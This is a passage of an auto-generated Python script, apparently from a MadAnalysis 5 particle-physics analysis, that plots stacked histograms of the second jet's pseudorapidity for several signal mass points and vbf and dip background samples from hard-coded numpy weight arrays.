y5_ETA_11_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.000180814219866,0.0,0.0,0.0,0.0,0.000180745208083,0.0,0.000722789817579,0.000541501026178,0.0,0.0,0.000180671921576,0.0,0.00126358570663,0.000721773126145,0.00108518832405,0.000721297899921,0.000902511594796,0.000723285839764,0.000723493799376,0.000721499312656,0.00126454386128,0.0019856191674,0.00198612173646,0.00108395712613,0.00162413298745,0.000902164995444,0.00162516238752,0.0034314117686,0.00288654949893,0.00306978733402,0.00613716926854,0.00397395028218,0.00577876628238,0.0048752472388,0.00325236470479,0.00433244184372,0.00523725485822,0.002348185582,0.00288798403514,0.00126357376821,0.000180062561403,0.00036126485701,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.000180716286293,0.000541808344271,0.00036126485701,0.00162486431208,0.00144244791745,0.00198723701616,0.00433470629283,0.00379308549732,0.0037906315739,0.00686007538945,0.00487359126411,0.00288952563204,0.00469405279944,0.00379094004733,0.00307069850521,0.00252805909271,0.00144634330907,0.00144421403371,0.00108284646776,0.00126255322567,0.000721577490066,0.000720977488075,0.00162520783055,0.000542324392196,0.000542304751566,0.00108244672317,0.0016257804897,0.000361514100456,0.000540905645512,0.000180612152443,0.00054218151624,0.000542731068769,0.000180745208083,0.000361432380031,0.0,0.000180461112147,0.000180176168968,0.0,0.000360324571478,0.0,0.000180814219866,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y5_ETA_12
y5_ETA_12_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0121240822392,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0121753353338,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0121313846429,0.012170493784,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y5_ETA_13
y5_ETA_13_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0200482816269,0.010032919325,0.0200940397991,0.0100262832744,0.010040728874,0.0100696696577,0.0100271592661,0.0301165257319,0.0401877986198,0.0,0.0502017229729,0.010040728874,0.0,0.0301145712787,0.0402058597513,0.0,0.0100568562125,0.0401512714171,0.0,0.0301337191358,0.0100702894631,0.0,0.050140155629,0.0300994521571,0.0100355638284,0.0100184158769,0.0401671012489,0.0100262832744,0.0301196784758,0.0,0.0,0.0100367001384,0.0100153623019,0.0,0.0,0.0,0.0100369728528,0.0100609841169,0.0,0.0,0.0100568562125,0.0100602899348,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0100340928234,0.0100568562125,0.0,0.0,0.0100532489446,0.0200646444914,0.0301498340782,0.0200868128673,0.0301214387233,0.0301310828965,0.010045943504,0.0200609297906,0.0200572522781,0.0,0.0301088194839,0.010045943504,0.0,0.0301025759767,0.0200638924608,0.0201178403294,0.0300965762597,0.0100299566548,0.0200777058588,0.0100187051194,0.0301077410223,0.0301692711779,0.0100355638284,0.0100324441408,0.0200798255935,0.0,0.0100369728528,0.0200832055994,0.0,0.0,0.0100696696577,0.0,0.0100187051194,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y5_ETA_14
y5_ETA_14_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.027528906052,0.0275004145408,0.00549723253823,0.0164559054838,0.0110056171082,0.0770310847232,0.0440020169472,0.0550197773788,0.0330105907486,0.0549847571553,0.0880434418024,0.121014169624,0.0934786861076,0.088023372208,0.0990548644673,0.148394743497,0.170526224648,0.121020669897,0.0935958535372,0.15400569832,0.154120306267,0.159507367295,0.142959864833,0.132024495368,0.137438938798,0.0990098500734,0.09901927547,0.115524891795,0.126518641842,0.0935515297974,0.093431802885,0.0660046708025,0.0824784357877,0.0495015327065,0.0275040343806,0.0220225528175,0.0275192084565,0.0330340486105,0.0164733099661,0.0275217679392,0.0329655113519,0.0439578150875,0.0,0.0,0.0110062752609,0.0,0.00551642865838,0.0,0.0110014894345,0.0,0.0,0.0,0.00548486983059,0.0165070057588,0.0219859725285,0.0219787084729,0.0165035849898,0.00547500566556,0.0275132728943,0.0385051663,0.0440374840644,0.044009736022,0.0220046486267,0.0550118551704,0.0384934454944,0.0825167874013,0.0880206908452,0.110052636558,0.14301101386,0.0660153962538,0.131970543098,0.143017067239,0.0990156596928,0.176047841337,0.0880200814446,0.197998127364,0.170386184381,0.214440691037,0.143028077078,0.126557521602,0.0935057028693,0.131973996368,0.104504450001,0.0824594631145,0.0880294662144,0.0990419858005,0.0770282002268,0.0385437169845,0.093524188022,0.0329922193506,0.0439702062338,0.0494880040123,0.0274670884511,0.0164765154134,0.0165101502661,0.0110076159423,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y5_ETA_15
y5_ETA_15_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.00295952505786,0.0019773310905,0.00197153430753,0.00295929337894,0.00592187756055,0.00987039584103,0.0108509548286,0.0207193705764,0.0266393081266,0.0276408104077,0.028623694201,0.0355146550268,0.040458795433,0.0621734434226,0.0641551399372,0.0779457675856,0.0908033063755,0.0967033828694,0.117432754119,0.134203862945,0.123367462203,0.14899303476,0.140128189568,0.162829477115,0.144093546658,0.165767390298,0.164779187509,0.149023096903,0.120400809611,0.122391324354,0.138132504136,0.112511982019,0.108561094842,0.0799076631682,0.0848781380123,0.0720595597606,0.0690840087744,0.0631659751599,0.0463968303938,0.0444055941589,0.0384984149825,0.0266470561431,0.0207270704935,0.0118380833966,0.0148115580909,0.010860875336,0.0138142124022,0.00690763529484,0.00591851861702,0.00691147924096,0.00493374291276,0.00296531542757,0.00591940043991,0.0108586988368,0.00493375092933,0.0167750008718,0.0177599809986,0.0217172092842,0.0335441777043,0.0325653743459,0.0473590594902,0.0463920204508,0.0789577395092,0.0641605511231,0.0838847645349,0.0897997117693,0.0967035432009,0.105586706258,0.125336612782,0.130288409015,0.145035774408,0.145060786111,0.146026061505,0.141099958385,0.141132024672,0.156908918281,0.165768232038,0.161842396647,0.146058288123,0.12731750764,0.127304761291,0.111518849039,0.113462226341,0.0838649636029,0.0779592755088,0.0710697937405,0.0680979704601,0.060191185748,0.0444233508651,0.0375124688587,0.0276394556071,0.0197401022569,0.0167707320474,0.0128311522443,0.0118483686581,0.00395132367973,0.0098704038576,0.00296028903714,0.00395140384545,0.000988171524021,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y5_ETA_16
y5_ETA_16_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.000504683064297,0.000503673995848,0.00176456904041,0.000504662658869,0.000755176904892,0.00201613916733,0.00327593912055,0.0052941964514,0.00680464228566,0.00655437570553,0.00806682207201,0.0118487722101,0.0141165835315,0.0199132536595,0.0214233514011,0.0251999881257,0.029492214016,0.0378149801786,0.0436050805587,0.0504108511445,0.0637772070879,0.0569611137558,0.064279780791,0.0688137469931,0.0799062179993,0.0819233146213,0.0809142061613,0.0756257192288,0.0680646276998,0.0690648537968,0.0690643736691,0.0655375153948,0.0534379364608,0.0544486453466,0.0458824064113,0.0415930252778,0.0373026518803,0.0315083103719,0.0287376892846,0.023186516468,0.0178977894717,0.0121010153161,0.0110908625782,0.00630208858785,0.00605014556172,0.00277111641911,0.00252142599225,0.00252007683333,0.000756169568977,0.000252086144206,0.00050443299777,0.000505573301133,0.00226871956303,0.00176499515377,0.00428539607331,0.00680943556085,0.00882158686726,0.00907575848628,0.0128560761901,0.0158825493435,0.0214315455811,0.0249591480534,0.0294984396722,0.0345365199873,0.0410879709147,0.0509199465827,0.0496597713296,0.0557024989179,0.062018579228,0.0660450104071,0.0710827906424,0.082936744231,0.0829245809951,0.0801550842069,0.0826753146811,0.0796696750701,0.0736030611272,0.0688247099097,0.0622641245521,0.0549595812744,0.0529467657913,0.0496584109677,0.0289897043299,0.0320075591905,0.0259642514479,0.0209242226145,0.015627597517,0.0128580087043,0.00933110641825,0.00730933655294,0.00554803598207,0.00478858594036,0.00403263282897,0.00378057657272,0.00252240785346,0.00277570443969,0.00100821822321,0.00126129195015,0.000251611017805,0.000756474450087,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y5_ETA_17
y5_ETA_17_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.00028397803684,0.000287149347103,0.000572588866082,0.00086141364879,0.000858296726698,0.00142988101127,0.000286470894662,0.00143133869423,0.00114646765162,0.00314968296684,0.00143539981097,0.00458093168064,0.0057261476045,0.00572488787848,0.00887590355546,0.00687069867296,0.0114469703671,0.0160359123056,0.0146129317935,0.0186010244123,0.0286497888791,0.0243326878172,0.0300785281387,0.0352288279859,0.0400557281701,0.0372345617533,0.0437990640218,0.0463780331148,0.0437855069704,0.0435079573354,0.0406790925929,0.0394877616987,0.0380785181989,0.0357858868296,0.032346174942,0.0226292083116,0.0206155562663,0.015179688528,0.020604168743,0.0111674111692,0.00916546857718,0.0054315786711,0.00257291540959,0.0037264495243,0.00114227456358,0.000287273220162,0.00114801731457,0.0,0.000287273220162,0.0,0.0,0.0,0.000287793407025,0.000861278578167,0.00114297141202,0.00171339134983,0.00372279431928,0.00372059779701,0.0065844659265,0.00831201019817,0.0151661214788,0.0157296089243,0.016317561049,0.0266210901063,0.0269072278734,0.0346329275899,0.0317871765201,0.0352405254418,0.0412565470008,0.0455105017965,0.0466690198273,0.0443771182992,0.0406805422776,0.0377842721953,0.0446466596759,0.0363888956796,0.0366208952214,0.0303472696893,0.030643575245,0.0248930259477,0.0194702853544,0.0188994395092,0.018906557961,0.0114497397648,0.00829914699583,0.00743626066733,0.00657748444492,0.00430174740119,0.00487046270975,0.0031525963332,0.00228915312583,0.00114443609346,0.0025791100623,0.00114010603522,0.00200939997011,0.000284795359079,0.000568850879067,0.000572936090563,0.000571773843343,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y5_ETA_18
y5_ETA_18_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,2.1618685923e-05,8.6306915748e-05,0.00012954796737,0.000129536567609,0.0,0.00021618782318,8.64075018695e-05,0.00028070459977,0.000151293094238,0.000343869582707,0.000475242601431,0.000451927157561,0.000626455813524,0.000691292370159,0.000842881522882,0.00116484261009,0.00148856018245,0.00172800754039,0.00219831806899,0.00239747607504,0.00293766294407,0.00323993555532,0.00427716497209,0.0039507244496,0.00449213846932,0.00535521349432,0.00686507404534,0.00835788524876,0.00760034602072,0.00800891846434,0.00731679374403,0.00745136540142,0.00660820642848,0.00587277519175,0.00518380216991,0.0038003029341,0.00341139507724,0.00239798235851,0.00164156424662,0.00140402257659,0.000907128812487,0.000885176310565,0.000280894414163,0.000194330836162,0.00015137138377,6.48865144083e-05,0.0,2.15796710811e-05,0.0,0.0,0.0,0.0,6.48430528216e-05,0.000129661629687,0.000129611588091,0.000237677712765,0.000539844038006,0.000734505844419,0.00138271382584,0.00157626792759,0.00254851032765,0.00319534572763,0.00494570643798,0.00468611880475,0.00554973867125,0.0064568704175,0.00708366026077,0.008572385153,0.0082268802076,0.00800945911475,0.00751491906589,0.00720902828803,0.00658465251168,0.00541949221709,0.00516276709723,0.00406114286454,0.00349812085037,0.00246263031617,0.00222270643149,0.00216037656483,0.0013609738121,0.00146885158926,0.00127432222124,0.00120975179872,0.000820848132953,0.000799510044589,0.000583198751945,0.000151295189783,0.000323900722923,0.000302215444797,0.000365619529328,0.000194625553498,0.000172684325603,0.000172933318165,0.00010811381926,0.000108022872642,8.64117767797e-05,4.32329628209e-05,4.32184197442e-05,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y5_ETA_19
y5_ETA_19_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,2.84378672588e-05,0.0,2.84059927191e-05,2.84059927191e-05,5.66202034917e-05,2.84378672588e-05,0.000227067626323,0.000142116318942,0.000112807263774,0.000312132692837,0.000197686756896,0.000113550448522,0.000396911244965,0.000367363427809,0.000339191295587,0.00067976703938,0.000312547388619,0.000509888813246,0.00079511796866,0.000766209424659,0.000766636002842,0.00110922269441,0.00129734634674,0.00142008471303,0.00121819143778,0.00155774856277,0.00207208273063,0.0015581956381,0.00175813485257,0.00116410141327,0.00118541249883,0.000852022042703,0.000625733307743,0.000568403546697,0.000224870273383,8.52734838212e-05,5.67168816739e-05,2.84575177789e-05,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,2.82249494922e-05,0.0,2.61934006008e-05,2.84059927191e-05,0.000283024078914,0.000310853552407,0.000424200811878,0.000452441267903,0.000852991943656,0.00084993786963,0.00096418269594,0.00144583045904,0.00127490925519,0.00204266784783,0.0013638726403,0.00150032092045,0.00135943604895,0.00141977235442,0.000965568183855,0.00113252734974,0.000737446885655,0.000680515779151,0.000482830804615,0.00039718855049,0.000283947787034,0.000281869258102,0.0002823934205,0.000168857379389,0.000227286708085,0.000170511855148,0.000141927344213,0.000198385887644,5.68226944517e-05,8.50737555193e-05,0.00011367724859,0.000113689145844,5.68953850377e-05,2.84575177789e-05,0.0,8.52219587614e-05,0.0,0.0,2.83770739265e-05,2.84575177789e-05,0.0,2.83770739265e-05,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating a new Canvas
fig = plt.figure(figsize=(12,6),dpi=80)
frame = gridspec.GridSpec(1,1,right=0.7)
pad = fig.add_subplot(frame[0])
# Creating a new Stack
pad.hist(x=xData, bins=xBinning, weights=y5_ETA_0_weights+y5_ETA_1_weights+y5_ETA_2_weights+y5_ETA_3_weights+y5_ETA_4_weights+y5_ETA_5_weights+y5_ETA_6_weights+y5_ETA_7_weights+y5_ETA_8_weights+y5_ETA_9_weights+y5_ETA_10_weights+y5_ETA_11_weights+y5_ETA_12_weights+y5_ETA_13_weights+y5_ETA_14_weights+y5_ETA_15_weights+y5_ETA_16_weights+y5_ETA_17_weights+y5_ETA_18_weights+y5_ETA_19_weights,\
label="$bg\_vbf\_1600\_inf$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#ccc6aa", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y5_ETA_0_weights+y5_ETA_1_weights+y5_ETA_2_weights+y5_ETA_3_weights+y5_ETA_4_weights+y5_ETA_5_weights+y5_ETA_6_weights+y5_ETA_7_weights+y5_ETA_8_weights+y5_ETA_9_weights+y5_ETA_10_weights+y5_ETA_11_weights+y5_ETA_12_weights+y5_ETA_13_weights+y5_ETA_14_weights+y5_ETA_15_weights+y5_ETA_16_weights+y5_ETA_17_weights+y5_ETA_18_weights,\
label="$bg\_vbf\_1200\_1600$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#c1bfa8", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y5_ETA_0_weights+y5_ETA_1_weights+y5_ETA_2_weights+y5_ETA_3_weights+y5_ETA_4_weights+y5_ETA_5_weights+y5_ETA_6_weights+y5_ETA_7_weights+y5_ETA_8_weights+y5_ETA_9_weights+y5_ETA_10_weights+y5_ETA_11_weights+y5_ETA_12_weights+y5_ETA_13_weights+y5_ETA_14_weights+y5_ETA_15_weights+y5_ETA_16_weights+y5_ETA_17_weights,\
label="$bg\_vbf\_800\_1200$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#bab5a3", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y5_ETA_0_weights+y5_ETA_1_weights+y5_ETA_2_weights+y5_ETA_3_weights+y5_ETA_4_weights+y5_ETA_5_weights+y5_ETA_6_weights+y5_ETA_7_weights+y5_ETA_8_weights+y5_ETA_9_weights+y5_ETA_10_weights+y5_ETA_11_weights+y5_ETA_12_weights+y5_ETA_13_weights+y5_ETA_14_weights+y5_ETA_15_weights+y5_ETA_16_weights,\
label="$bg\_vbf\_600\_800$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#b2a596", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y5_ETA_0_weights+y5_ETA_1_weights+y5_ETA_2_weights+y5_ETA_3_weights+y5_ETA_4_weights+y5_ETA_5_weights+y5_ETA_6_weights+y5_ETA_7_weights+y5_ETA_8_weights+y5_ETA_9_weights+y5_ETA_10_weights+y5_ETA_11_weights+y5_ETA_12_weights+y5_ETA_13_weights+y5_ETA_14_weights+y5_ETA_15_weights,\
label="$bg\_vbf\_400\_600$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#b7a39b", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y5_ETA_0_weights+y5_ETA_1_weights+y5_ETA_2_weights+y5_ETA_3_weights+y5_ETA_4_weights+y5_ETA_5_weights+y5_ETA_6_weights+y5_ETA_7_weights+y5_ETA_8_weights+y5_ETA_9_weights+y5_ETA_10_weights+y5_ETA_11_weights+y5_ETA_12_weights+y5_ETA_13_weights+y5_ETA_14_weights,\
label="$bg\_vbf\_200\_400$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#ad998c", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y5_ETA_0_weights+y5_ETA_1_weights+y5_ETA_2_weights+y5_ETA_3_weights+y5_ETA_4_weights+y5_ETA_5_weights+y5_ETA_6_weights+y5_ETA_7_weights+y5_ETA_8_weights+y5_ETA_9_weights+y5_ETA_10_weights+y5_ETA_11_weights+y5_ETA_12_weights+y5_ETA_13_weights,\
label="$bg\_vbf\_100\_200$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#9b8e82", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y5_ETA_0_weights+y5_ETA_1_weights+y5_ETA_2_weights+y5_ETA_3_weights+y5_ETA_4_weights+y5_ETA_5_weights+y5_ETA_6_weights+y5_ETA_7_weights+y5_ETA_8_weights+y5_ETA_9_weights+y5_ETA_10_weights+y5_ETA_11_weights+y5_ETA_12_weights,\
label="$bg\_vbf\_0\_100$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#876656", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y5_ETA_0_weights+y5_ETA_1_weights+y5_ETA_2_weights+y5_ETA_3_weights+y5_ETA_4_weights+y5_ETA_5_weights+y5_ETA_6_weights+y5_ETA_7_weights+y5_ETA_8_weights+y5_ETA_9_weights+y5_ETA_10_weights+y5_ETA_11_weights,\
label="$bg\_dip\_1600\_inf$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#afcec6", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y5_ETA_0_weights+y5_ETA_1_weights+y5_ETA_2_weights+y5_ETA_3_weights+y5_ETA_4_weights+y5_ETA_5_weights+y5_ETA_6_weights+y5_ETA_7_weights+y5_ETA_8_weights+y5_ETA_9_weights+y5_ETA_10_weights,\
label="$bg\_dip\_1200\_1600$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#84c1a3", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y5_ETA_0_weights+y5_ETA_1_weights+y5_ETA_2_weights+y5_ETA_3_weights+y5_ETA_4_weights+y5_ETA_5_weights+y5_ETA_6_weights+y5_ETA_7_weights+y5_ETA_8_weights+y5_ETA_9_weights,\
label="$bg\_dip\_800\_1200$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#89a8a0", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y5_ETA_0_weights+y5_ETA_1_weights+y5_ETA_2_weights+y5_ETA_3_weights+y5_ETA_4_weights+y5_ETA_5_weights+y5_ETA_6_weights+y5_ETA_7_weights+y5_ETA_8_weights,\
label="$bg\_dip\_600\_800$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#829e8c", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y5_ETA_0_weights+y5_ETA_1_weights+y5_ETA_2_weights+y5_ETA_3_weights+y5_ETA_4_weights+y5_ETA_5_weights+y5_ETA_6_weights+y5_ETA_7_weights,\
label="$bg\_dip\_400\_600$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#adbcc6", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y5_ETA_0_weights+y5_ETA_1_weights+y5_ETA_2_weights+y5_ETA_3_weights+y5_ETA_4_weights+y5_ETA_5_weights+y5_ETA_6_weights,\
label="$bg\_dip\_200\_400$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#7a8e99", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y5_ETA_0_weights+y5_ETA_1_weights+y5_ETA_2_weights+y5_ETA_3_weights+y5_ETA_4_weights+y5_ETA_5_weights,\
label="$bg\_dip\_100\_200$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#758991", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y5_ETA_0_weights+y5_ETA_1_weights+y5_ETA_2_weights+y5_ETA_3_weights+y5_ETA_4_weights,\
label="$bg\_dip\_0\_100$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#688296", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y5_ETA_0_weights+y5_ETA_1_weights+y5_ETA_2_weights+y5_ETA_3_weights,\
label="$signal\_2pt4TeVL$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#6d7a84", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y5_ETA_0_weights+y5_ETA_1_weights+y5_ETA_2_weights,\
label="$signal\_2pt2TeVL$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#7c99d1", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y5_ETA_0_weights+y5_ETA_1_weights,\
label="$signal\_2TeVL$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#7f7f9b", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y5_ETA_0_weights,\
label="$signal\_1pt8TeVL$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#aaa5bf", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical")
# Axis
plt.rc('text',usetex=False)
plt.xlabel(r"\eta [ j_{2} ] ",\
fontsize=16,color="black")
plt.ylabel(r"$\mathrm{Events}$ $(\mathcal{L}_{\mathrm{int}} = 40.0\ \mathrm{fb}^{-1})$ ",\
fontsize=16,color="black")
# Boundary of y-axis
ymax=(y5_ETA_0_weights+y5_ETA_1_weights+y5_ETA_2_weights+y5_ETA_3_weights+y5_ETA_4_weights+y5_ETA_5_weights+y5_ETA_6_weights+y5_ETA_7_weights+y5_ETA_8_weights+y5_ETA_9_weights+y5_ETA_10_weights+y5_ETA_11_weights+y5_ETA_12_weights+y5_ETA_13_weights+y5_ETA_14_weights+y5_ETA_15_weights+y5_ETA_16_weights+y5_ETA_17_weights+y5_ETA_18_weights+y5_ETA_19_weights).max()*1.1
ymin=0 # linear scale
#ymin=min([x for x in (y5_ETA_0_weights+y5_ETA_1_weights+y5_ETA_2_weights+y5_ETA_3_weights+y5_ETA_4_weights+y5_ETA_5_weights+y5_ETA_6_weights+y5_ETA_7_weights+y5_ETA_8_weights+y5_ETA_9_weights+y5_ETA_10_weights+y5_ETA_11_weights+y5_ETA_12_weights+y5_ETA_13_weights+y5_ETA_14_weights+y5_ETA_15_weights+y5_ETA_16_weights+y5_ETA_17_weights+y5_ETA_18_weights+y5_ETA_19_weights) if x])/100. # log scale
plt.gca().set_ylim(ymin,ymax)
# Log/Linear scale for X-axis
plt.gca().set_xscale("linear")
#plt.gca().set_xscale("log",nonposx="clip")
# Log/Linear scale for Y-axis
plt.gca().set_yscale("linear")
#plt.gca().set_yscale("log",nonposy="clip")
# Legend
plt.legend(bbox_to_anchor=(1.05,1), loc=2, borderaxespad=0.)
# Saving the image
plt.savefig('../../HTML/MadAnalysis5job_0/selection_4.png')
plt.savefig('../../PDF/MadAnalysis5job_0/selection_4.png')
plt.savefig('../../DVI/MadAnalysis5job_0/selection_4.eps')
# Running!
if __name__ == '__main__':
selection_4()
